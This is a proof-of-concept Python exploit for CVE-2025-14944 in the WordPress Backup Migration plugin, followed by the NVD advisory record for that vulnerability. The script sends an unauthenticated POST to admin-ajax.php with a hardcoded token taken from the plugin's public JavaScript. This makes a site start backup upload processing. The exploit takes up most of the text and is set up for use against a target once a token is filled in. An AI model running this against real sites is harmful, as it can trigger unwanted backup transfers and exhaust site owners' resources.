CVE-2025-14944

import requests # Target configuration target_url = "http://example.com/wp-admin/admin-ajax.php" # The hardcoded token is usually found in the plugin's JS files (e.g., offline.js) # Example: var bm_token = "1234567890abcdef"; hardcoded_token = "REPLACE_WITH_ACTUAL_TOKEN_FROM_JS" # Data payload based on vulnerable function payload = { "action": "backup_migration_initialize_offline", "token": hardcoded_token, "backup_id": "trigger_exhaustion" # Arbitrary data to trigger processing } headers = { "User-Agent": "CVE-2025-14944-PoC", "Content-Type": "application/x-www-form-urlencoded" } try: # Send unauthenticated POST request response = requests.post(target_url, data=payload, headers=headers, timeout=10) if response.status_code == 200: print("[+] Request sent successfully. Check if backup processing started.") print(f"[+] Response: {response.text[:200]}") else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}")

{"cve": {"id": "CVE-2025-14944", "sourceIdentifier": "[email protected]", "published": "2026-04-07T17:16:25.927", "lastModified": "2026-04-27T19:04:22.650", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Backup Migration plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 2.0.0. This is due to a missing capability check on the 'initializeOfflineAjax' function and lack of proper nonce verification. The endpoint only validates against hardcoded tokens which are publicly exposed in the plugin's JavaScript. This makes it possible for unauthenticated attackers to trigger the backup upload queue processing, potentially causing unexpected backup transfers to configured cloud storage targets and resource exhaustion."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/backup-backup/trunk/includes/ajax_offline.php#L112", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/backup-backup/trunk/includes/offline.php#L29", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?old=3386897&old_path=backup-backup%2Ftags%2F2.0.0%2Fincludes%2Foffline.php&new=3449635&new_path=backup-backup%2Ftags%2F2.1.0%2Fincludes%2Foffline.php", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/a2a41a15-0743-48cc-8c92-7cb839fa5847?source=cve", "source": "[email protected]"}]}}